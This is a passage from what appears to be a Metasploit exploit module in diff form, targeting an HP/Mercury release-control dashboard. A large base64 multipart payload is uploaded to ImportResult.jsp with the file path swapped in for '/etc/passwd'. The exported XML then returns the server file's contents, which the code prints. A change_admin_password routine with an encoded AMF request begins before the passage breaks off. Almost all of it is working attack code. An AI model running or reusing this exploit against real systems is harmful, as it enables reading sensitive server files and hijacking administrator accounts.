5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5Hcm91cCBCeTo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjE8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bd2Vla11bV2Vla108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlsyOTQ5MThdW0xhdGVudF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+TGF0ZW50IENoYW5nZXMgT3ZlciBUaW1lPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZS8+PHRvb2x0aXBTb3VyY2U+Q291bnQ8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+Q291bnQ8L3lBeGlzU291cmNlPjx5QXhpc0xhYmVsPkNvdW50PC95QXhpc0xhYmVsPjxzZXJpZXNTb3VyY2U+TGluZSBMYWJlbDwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5MYXRlbnQgQ2hhbmdlczwvc2VyaWVzTGFiZWw+PC9MaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5MaW5lQ2hhcnQ8L3R5cGU+PG5hbWU+TGF0ZW50IENoYW5nZXMgT3ZlciBUaW1lPC9uYW1lPjx1dWlkPjNiN2JiNmFhMDI5NzdmNWM6Njk0MDIxMGI6MTE2M2JjYjM5NGE6LTdmZGY8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjxDaGFydFBvcnRsZXREZWZpbml0aW9uPjxCdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGRhdGFTb3VyY2U+PGlkPk9VVENPTUVfR1JPVVBCWV9OVU1FUklDX0ZJRUxEX0RBVEFfU09VUkNFPC9pZD48bmFtZT5PdXRjb21lIEdyb3VwIGJ5IE51bWVyaWMgRmllbGQ8L25hbWU+PC9kYXRhU291cmNlPjxwcmVmZXJlbmNlU3VtbWFyeVNob3duPnRydWU8L3ByZWZlcmVuY2VTdW1tYXJ5U2hvd24+PHJlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PmZhbHNlPC9yZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz48aGVscFRleHQvPjxwcmVmZXJlbmNlPjxuYW1lPk1heGltdW0gVmFsdWU8L25hbWU+PHR5cGU+dGV4dDwvdHlwZT48cHJvbXB0Pk1heGltdW0gVmFsdWU6PC9wcm9tcHQ+PGxheW91dFJvdz4zPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWU+WzEwMF1bXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5NaW5pbXVuIFZhbHVlPC9uYW1lPjx0eXBlPnRleHQ8L3R5cGU+PHByb21wdD5NaW5pbXVuIFZhbHVlOjwvcHJvbXB0PjxsYXlvdXRSb3c+MjwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlswXVtdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjxwcmVmZXJlbmNlPjxuYW1lPkludGVydmFsPC9uYW1lPjx0eXBlPnRleHQ8L3R5cGU+PHByb21wdD5JbnRlcnZhbDo8L3Byb21wdD48bGF5b3V0Um93PjQ8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bMTBdW108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlLz48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+TnVtZXJpYyBUeXBlPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+TnVtZXJpYyBUeXBlOjwvcHJvbXB0PjxsYXlvdXRSb3c+MTwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltjYWxjdWxhdGVkLXJpc2tdW2NhbGN1bGF0ZWQtcmlza108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+T3V0Y29tZSBHcm91cCBCeSBSaXNrPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZT5Db2xvcjwvY29sb3JTb3VyY2U+PHRvb2x0aXBTb3VyY2U+VG9vbHRpcDwvdG9vbHRpcFNvdXJjZT48dG9vbHRpcENvbnRhaW5zSFRNTD5mYWxzZTwvdG9vbHRpcENvbnRhaW5zSFRNTD48b3JpZW50YXRpb24+dmVydGljYWw8L29yaWVudGF0aW9uPjxoeXBlcmxpbms+PGh5cGVybGlua1R5cGU+bm9IeXBlcmxpbms8L2h5cGVybGlua1R5cGU+PGh5cGVybGlua1NvdXJjZS8+PC9oeXBlcmxpbms+PC9DaGFydFBvcnRsZXREZWZpbml0aW9uPjxiYXJOYW1lU291cmNlPkZpZWxkPC9iYXJOYW1lU291cmNlPjxiYXJBeGlzTGFiZWw+UmlzazwvYmFyQXhpc0xhYmVsPjx2YWx1ZVNvdXJjZT5QZXJjZW50YWdlPC92YWx1ZVNvdXJjZT48dmFsdWVBeGlzTGFiZWw+UGVyY2VudGFnZTwvdmFsdWVBeGlzTGFiZWw+PHNlcmllc1NvdXJjZT5PdXRjb21lPC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPk91dGNvbWU8L3Nlcmllc0xhYmVsPjwvTXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkNsdXN0ZXJlZEJhckNoYXJ0PC90eXBlPjxuYW1lPk91dGNvbWUgR3JvdXBlZCBCeSBSaXNrPC9uYW1lPjx1dWlkPjZhMzY3M2M5ZmViNzZkY2I6LTUxOTcwOGNjOjExNzJiYTU3OWVkOi03ZmYxPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPmZhbHNlPC9leHBvcnRBc1dTUlA+PHN1cHBvcnREcmlsbFRvPnRydWU8L3N1cHBvcnREcmlsbFRvPjxwb3J0bGV0Q29tbVN1cD5mYWxzZTwvcG9ydGxldENvbW1TdXA+PGJ1aWx0SW4+ZmFsc2U8L2J1aWx0SW4+PGRlcGVuZGVudFV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmM8L2RlcGVuZGVudFV1aWQ+PC9Qb3J0bGV0RGVmaW5pdGlvbj48UG9ydGxldERlZmluaXRpb24+PE11bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BUFBMSUNBVElPTl9TRVZFUklUWV9ESVNUUklCVVRJT048L2lkPjxuYW1lPkJ1c2luZXNzIENJIFNldmVyaXR5IERpc3RyaWJ1dGlvbjwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+VXNlciBBcHBsaWNhdGlvbnM8L25hbWU+PHR5cGU+eWVzTm88L3R5cGU+PHByb21wdD5TaG93IE9ubHkgVXNlciBBcHBsaWNhdGlvbnM8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bWV1bWWVzXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPmVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5SZXF1ZXN0IFN0YXR1czwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MTwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QXBwbGljYXRpb24gU2V2ZXJpdHkgRGlzdHJpYnV0aW9uPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZT5TZXZlcml0eSBDb2xvcnM8L2NvbG9yU291cmNlPjx0b29sdGlwU291cmNlPiMgUmVxdWVzdHM8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uPnZlcnRpY2FsPC9vcmllbnRhdGlvbj48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48YmFyTmFtZVNvdXJjZT5JbXBhY3RlZCBBcHBsaWNhdGlvbjwvYmFyTmFtZVNvdXJjZT48YmFyQXhpc0xhYmVsPkltcGFjdGVkIEFwcGxpY2F0aW9uPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48c2VyaWVzU291cmNlPlNldmVyaXR5PC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPlNldmVyaXR5PC9zZXJpZXNMYWJlbD48L011bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5DbHVzdGVyZWRCYXJDaGFydDwvdHlwZT48bmFtZT5BcHBsaWNhdGlvbiBTZXZlcml0eSBEaXN0cmlidXRpb248L25hbWU+PHV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTgwMDA8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjI8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+dHJ1ZTwvZXhwb3J0QXNXU1JQPjxzdXBwb3J0RHJpbGxUbz50cnVlPC9zdXBwb3J0RHJpbGxUbz48cG9ydGxldENvbW1TdXA+ZmFsc2U8L3BvcnRsZXRDb21tU3VwPjxidWlsdEluPmZhbHNlPC9idWlsdEluPjxkZXBlbmRlbnRVdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC9kZXBlbmRlbnRVdWlkPjwvUG9ydGxldERlZmluaXRpb24+PFBvcnRsZXREZWZpbml0aW9uPjxMaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BQk5PUk1BTF9DSEFOR0VfT1ZFUl9USU1FX0RBVEFfU09VUkNFPC9pZD48bmFtZT5BYm5vcm1hbCBDaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5Hcm91cCBCeTo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjE8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bd2Vla11bV2Vla108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlLz48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QWJub3JtYWwgQ2hhbmdlcyBPdmVyIFRpbWU8L2NoYXJ0VGl0bGU+PGNvbG9yU291cmNlLz48dG9vbHRpcFNvdXJjZT5Db3VudDwvdG9vbHRpcFNvdXJjZT48dG9vbHRpcENvbnRhaW5zSFRNTD5mYWxzZTwvdG9vbHRpcENvbnRhaW5zSFRNTD48b3JpZW50YXRpb24vPjxoeXBlcmxpbms+PGh5cGVybGlua1R5cGU+bm9IeXBlcmxpbms8L2h5cGVybGlua1R5cGU+PGh5cGVybGlua1NvdXJjZS8+PC9oeXBlcmxpbms+PC9DaGFydFBvcnRsZXREZWZpbml0aW9uPjx4QXhpc1NvdXJjZT5QbGFubmluZyBTdGFydCBUaW1lPC94QXhpc1NvdXJjZT48eEF4aXNMYWJlbD5QbGFubmluZyBTdGFydCBUaW1lPC94QXhpc0xhYmVsPjx5QXhpc1NvdXJjZT5Db3VudDwveUF4aXNTb3VyY2U+PHlBeGlzTGFiZWw+Q291bnQ8L3lBeGlzTGFiZWw+PHNlcmllc1NvdXJjZT5MaW5lIExhYmVsPC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPkFibm9ybWFsIENoYW5nZXM8L3Nlcmllc0xhYmVsPjwvTGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PHR5cGU+TGluZUNoYXJ0PC90eXBlPjxuYW1lPkFibm9ybWFsIENoYW5nZXMgT3ZlciBUaW1lPC9uYW1lPjx1dWlkPjMyOWM4MTJjNTE3ODNlOWU6NmE5NTIwZjM6MTE2Mzk4MTdkYTI6LTdmZWI8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PENoYXJ0UG9ydGxldERlZmluaXRpb24+PEJ1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48ZGF0YVNvdXJjZT48aWQ+T1VUQ09NRV9PVkVSX1RJTUVfREFUQV9TT1VSQ0U8L2lkPjxuYW1lPk91dGNvbWUgT3ZlciBUaW1lPC9uYW1lPjwvZGF0YVNvdXJjZT48cHJlZmVyZW5jZVN1bW1hcnlTaG93bj50cnVlPC9wcmVmZXJlbmNlU3VtbWFyeVNob3duPjxyZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz5mYWxzZTwvcmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+PGhlbHBUZXh0Lz48cHJlZmVyZW5jZT48bmFtZT5GaWx0ZXI8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5GaWx0ZXI6PC9wcm9tcHQ+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWUvPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dHlwZT5kcm9wZG93bjwvdHlwZT48cHJvbXB0Pkdyb3VwIEJ5OjwvcHJvbXB0PjxsYXlvdXRSb3c+MTwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlt3ZWVrXVtXZWVrXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48L0J1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48Y2hhcnRUaXRsZT5PdXRjb21lIE92ZXIgVGltZTwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2U+Q29sb3I8L2NvbG9yU291cmNlPjx0b29sdGlwU291cmNlPlRvb2x0aXA8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+UGVyY2VudGFnZTwveUF4aXNTb3VyY2U+PHlBeGlzTGFiZWw+UGVyY2VudGFnZTwveUF4aXNMYWJlbD48c2VyaWVzU291cmNlPk91dGNvbWU8L3Nlcmllc1NvdXJjZT48c2VyaWVzTGFiZWw+T3V0Y29tZTwvc2VyaWVzTGFiZWw+PC9MaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5MaW5lQ2hhcnQ8L3R5cGU+PG5hbWU+T3V0Y29tZSBPdmVyIFRpbWU8L25hbWU+PHV1aWQ+NmEzNjczYzlmZWI3NmRjYjotMzYyNTYxNjY6MTE3MmIyOTE1YTI6LTdmZjQ8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjwvRXhwb3J0TGlzdD4NCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIucmVwbGFjZVBvcnRsZXREZWZzIg0KDQpZDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NjI3MDc2NjcxNDgyNDUyMDYwNDY2NDk5OTI2DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9Ii5yZXBsYWNlTW9kdWxlcyINCg0KWQ0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIudHJpYWwiDQoNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIucmVuYW1lU3VmZml4Ig0KDQoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ2MjcwNzY2NzE0ODI0NTIwNjA0NjY0OTk5MjYtLQ==")
+
+ data = data.sub('/etc/passwd', datastore['FILEPATH'])
+
+ res = send_request_cgi({
+ 'uri' => '/ccm/dashboard/app/migrator/ImportResult.jsp',#normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ImportResult.jsp?IS_WINDOID=Y'),
+ 'method' => 'POST',
+ 'ctype' => 'multipart/form-data; boundary=---------------------------14627076671482452060466499926',
+ 'cookie' => cookie,
+ 'data' => data.to_s
+ })
+
+ select(nil, nil, nil, 5)
+ post = {
+ 'com.mercury.dashboard.arch.fieldtree.formForFieldtree.' => 'Y',
+ '.exportPortletDefsLabel' => '',
+ '.exportPortletDefsHidden' => '',
+ '.exportModulesLabel' => 'Release Control Default Module',
+ '.exportModulesHidden' => '[98304][Release Control Default Module]'
+ }
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ExportResult.jsp?ISWINDOID=Y'),
+ 'method' => 'POST',
+ 'data' => 'com.mercury.dashboard.arch.fieldtree.formForFieldtree.=Y&.exportPortletDefsLabel=&.exportPortletDefsHidden=&.exportModulesLabel=Release+Control+Default+Module&.exportModulesHidden=%5B98304%5D%5BRelease+Control+Default+Module%5D',
+ 'cookie' => cookie
+ })
+
+ doc = REXML::Document.new res.body
+
+ file = ''
+ doc.elements.each('/ExportList/Module/description') do |element|
+ file = element.text
+ end
+
+ print file
+ end
+
+ def change_admin_password(cookie, admin_id)
+ req = Rex::Text::decode_base64("AAMAAAAEAARudWxsAAMvMzD/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgY9dXBkYXRlVXNlcldvcmtzcGFjZUxhbmRpbmdQYWdlCQMBAwEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkDAQMGSURFMDdDODYxLTBBOUUtMTE2MC0xMzkyLUZEOEZBRkQ3REQ3QgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMx/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA